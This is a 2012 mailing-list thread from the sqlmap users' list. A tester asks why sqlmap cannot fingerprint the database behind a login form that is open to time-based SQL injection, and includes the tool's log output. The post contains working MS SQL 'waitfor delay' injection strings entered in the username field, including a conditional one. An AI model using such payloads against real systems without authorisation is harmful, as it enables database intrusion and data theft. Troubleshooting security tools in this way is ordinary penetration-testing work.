Re: [sqlmap-users] Time based injection fails to fingerprint the DBMS
From: Chris O. <chr...@gm...> - 2012-01-22 18:18:57
In fact, don't worry about suggestions for manual syntax, te...@te...'if 1 = 1 waitfor delay'0:0:20'-- works so I can work with that.

But I wonder why sqlmap is struggling?

Chris

On 22 January 2012 18:12, Chris Oakley <chr...@gm...> wrote:

> Hi
>
> I've got a web app where the username field of the login form is affected
> by the following string: te...@te...'waitfor delay'0:0:10'-- as a
> username; i.e. the delay happens, the app is vulnerable. It will always
> then return you to the login screen with an invalid email error, but we
> should still be able to exploit the app using time-based methods. Sqlmap
> picks up on this, but then fails at the fingerprinting stage, i.e.:
>
> [18:04:03] [INFO] testing MySQL
> [18:04:03] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
> [18:04:16] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for --time-sec option as possible (e.g. 10 or more)
> [18:04:16] [WARNING] the back-end DBMS is not MySQL
> [18:04:16] [INFO] testing Oracle
> [18:04:17] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
> [18:04:17] [WARNING] the back-end DBMS is not Oracle
> [18:04:17] [INFO] testing PostgreSQL
> [18:04:17] [WARNING] the back-end DBMS is not PostgreSQL
> [18:04:17] [INFO] testing Microsoft SQL Server
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [18:04:18] [INFO] testing SQLite
> [18:04:18] [WARNING] the back-end DBMS is not SQLite
> [18:04:18] [INFO] testing Microsoft Access
> [18:04:18] [WARNING] the back-end DBMS is not Microsoft Access
> [18:04:18] [INFO] testing Firebird
> [18:04:19] [WARNING] the back-end DBMS is not Firebird
> [18:04:19] [INFO] testing SAP MaxDB
> [18:04:19] [WARNING] the back-end DBMS is not SAP MaxDB
> [18:04:19] [INFO] testing Sybase
> [18:04:19] [WARNING] the back-end DBMS is not Sybase
> [18:04:19] [INFO] testing IBM DB2
> [18:04:19] [WARNING] the back-end DBMS is not IBM DB2
> [18:04:19] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
>
> I'm not sure why this would be the case, it should be able to find that
> it's MS SQL Server.
>
> Any ideas why this might be the case? I can provide more verbose
> information if required, let me know.
>
> In the meantime, any ideas for some more manual injections taking into
> account the syntax of the injection above? I'm going to have a manual play
> now but I thought you might want to know wrt sqlmap.
>
> Cheers
>
> Chris